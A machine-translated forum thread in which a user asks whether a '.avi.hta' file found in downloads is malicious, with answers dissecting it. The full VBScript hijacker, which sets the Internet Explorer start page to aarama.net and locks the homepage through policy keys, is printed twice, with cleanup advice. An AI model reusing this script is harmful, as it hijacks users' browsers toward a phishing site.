помочь ... вирус? скомпрометирован? (aarama.net)

помогите мне пожалуйста определить, является ли мой компьютер или нет.

Я еще не уверен, что это.. Я все еще просматриваю некоторые файлы JavaScript (мой уровень = Новичок), которые я нашел во время своего "исследования"...

история:

  1. ОС Windows 7 х64 профессиональная, Есет смарт 4.2.71.2 безопасности, в последних версиях Firefox, Гугл Хром, т. е. 8
  2. Я нашел в папке Загрузки по умолчанию Chrome файл Адам-liseli-кызы-отеле-goturup-sikiyor.Ави.hta
    Это VB скрипт:

    Set shell = CreateObject("WScript.Shell")
    shell.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionURLPrefixesmirc","http://aarama.net/","REG_SZ"
    shell.regwrite "HKLMSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
    shell.regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
    shell.regwrite "HKCUSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://aarama.net/","REG_SZ"
    shell.regwrite "HKLMSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://aarama.net/","REG_SZ" 
    self.Close
    
  3. я следовал aarama.net, нашел там фишинговый сайт (я думаю), похожий на Google с большим количеством JavaScript, который я пытаюсь понять прямо сейчас..

17
задан sdadffdfd
02.02.2023 13:41 Количество просмотров материала 3442
Распечатать страницу

4 ответа

Ну, делая некоторые копать на уровне сети я могу сказать вам это много:

  1. домен зарегистрирован 20 дней назад.
  2. регистратор находится в Люксембурге, а телефонный номер-в Дании.
  3. сайт, кажется, турецкий.
  4. владелец домена прячется за PrivacyProtect
  5. сайт размещен на CloudFlair в Сан-Франциско.

в целом это кажется очень хитрым:

  1. Это новый домен
  2. регистрационные данные не добавлять
  3. скрывать, кто зарегистрировал домен не обязательно плохо, но кто-то гнусный сделает это
  4. CloudFlare раздавать бесплатные счета с очень мало проверки.

быстрый взгляд на javascript и игра с сайтом в ссылках не бросали ничего слишком неприятного, но я еще не проанализировал JS должным образом (это почти полночь). Я буду больше копаться в утро.

Если вы обнаружите, что это определенно вредоносных программ, то вызов CloudFlare будет для того, чтобы предупредить их к нему - они, вероятно, мгновенно закрыть сайт.

обновление

aarama.net переехал на хостинг установки в Германии, которая славится хостинг ботов и других сомнительных сайтов (your-server.de).

11
отвечен Majenko 2023-02-03 21:29

Я не говорю много сценария, но намерения этого, кажется, в основном ясно.

Set shell = CreateObject("WScript.Shell")

первая строка, я не совсем уверен. Тем не менее, некоторые Google, похоже, подтверждают мои мысли о том, что это довольно стандартная начальная строка для сценария.

остальные строки, как представляется, установка различных разделов реестра.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\mirc","http://aarama.net/","REG_SZ"

этот добавляет новый префикс URL-адреса в Internet Explorer. По сути, в любое время IE запрашивает ресурс, начинающийся с "mirc."и протокол не указан, в него вставим"http://aarama.net/ " перед адресом перед его обработкой. Так что, если бы вы печатали "mirc.google.com" в адресную строку, т. е. перевел бы его на"http://aarama.net/mirc.google.com". Это, вероятно, помогает некоторым другим скриптам на вредоносном сайте (или загруженным вредоносным программам) функционировать.

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"

добавить разделы реестра, которые обычно реализуют управление групповой политикой обозреватель Internet Explorer. Вы можете обнаружить, что вы больше не можете изменить вашу домашнюю страницу IE через Панель управления.

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ" 

эти поставили"http://aarama.net/ " на вашу домашнюю страницу-гарантируя, что вы зайдете на сайт хотя бы один раз, и у вас будет возможность стать жертвой любого фишингового мошенничества или вредоносного кода. Конечно, более ранние ключи будут убедиться, что вы не просто пойти один раз, так как вы не можете изменить домашнюю страницу.

self.Close

опять же, я не на самом деле говорить сценария. Но я думаю, что на этом все закончится.

некоторые вещи, которые вы должны сделать с этой информацией:

1.) (Слишком Поздно)не заходите на этот сайт.

2.) Имейте несколько хороших антивирусных / антивирусных программ, копающихся в вашей машине. Мои рекомендации Avast! сканирование во время загрузки, Malwarebytes и Spybot Search & Destroy. Если возможный, используйте отдельную, известный-хорошую, устранимую машину для того чтобы сделать сканирования. Или получите хороший LiveCD для сканирования.

3.) Проверьте реестр на наличие значений, созданных сценарием. Если они еще есть, резервную копию реестра, а затем удалить созданные значения или изменения их настроек. Первые три должны быть просто выброшены. Последние два, установите по своему усмотрению или "о: пустой".

4.) Если вы заметили какую-либо подозрительную активность в вашей системе после этого, пришло время для подхода "nuke from orbit". Надеюсь, у вас есть хорошая резервная копия.

8
отвечен Iszi 2023-02-03 23:46

Это выглядит очень странно. Я бы предложил несколько вещей-malwarebytes first-его хороший сканер, и один occationally заблокирован вредоносным ПО - его эффективность, когда он работает. Кроме этого, ищите нечетные процессы в process manager и netstat.

Я бы также предложил научиться использовать и использовать rootkit revealer (в случае руткитов) и hijackthis для подтверждения-журналы последнего очень полезны при попытке определить, было ли вторжение, Тхо, они берут некоторые интерпретирующий.

4
отвечен Journeyman Geek 2023-02-04 02:03

Я не эксперт, но похоже, что он делает этот домен домашней страницей для Internet explorer. Домен ссылается на Фишер Google.

цель состоит в том, чтобы заставить вас войти в свой аккаунт Google, чтобы они могли собирать счета. Я не внимательно посмотрел на сайт, но сомневаюсь, что он делает что-то еще.

независимо от того, что вы должны сканировать с Malwarebytes просто чтобы убедиться.

0
отвечен A Clockwork Orange 2023-02-04 04:20

Постоянная ссылка на данную страницу: [ Скопировать ссылку | Сгенерировать QR-код ]

Ваш ответ

Опубликуйте как Гость или авторизуйтесь

Имя
Вверх